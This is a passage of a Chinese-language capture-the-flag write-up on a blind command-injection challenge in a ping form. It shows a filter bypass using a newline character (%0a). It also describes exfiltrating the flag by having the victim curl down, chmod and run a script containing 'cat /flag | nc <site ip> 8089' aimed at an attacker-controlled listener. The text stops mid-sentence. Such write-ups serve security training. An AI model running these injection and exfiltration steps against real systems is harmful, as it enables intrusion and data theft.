參考:https://blog.csdn.net/m0_50317371/article/details/110489711
這個題有兩個問題:
第一個就是沒有回顯,輸入能夠ping的ip無回顯;輸入特殊字符,提示含有危險字符;不輸入,提示為空;這就導致即使執行成功的命令,比如:cat /flag,也不能看到flag
第二個問題就是過濾了很多字符,這個可用特殊字符字典抓包爆破,能夠快速查找到沒過濾的字符,%0a(換行符)
第一個問題方法:
- 需要一個可遠程訪問的網站,在網站上放一個文件,內容為 ls | cat /flag |nc 網站ip 8089; ls的查詢內容為cat 的輸入內容
- 在受害機上curl 這個文件到指定目錄
- 增加文件權限,chmod
- 在網站的ip下設置監聽
- 執行文件,sh file,受害機在執行文件后就會連接到網站ip
這樣,cat的內容才能在網站主機上顯示出來
因為我不是在本機上搭的這題的環境,我也沒有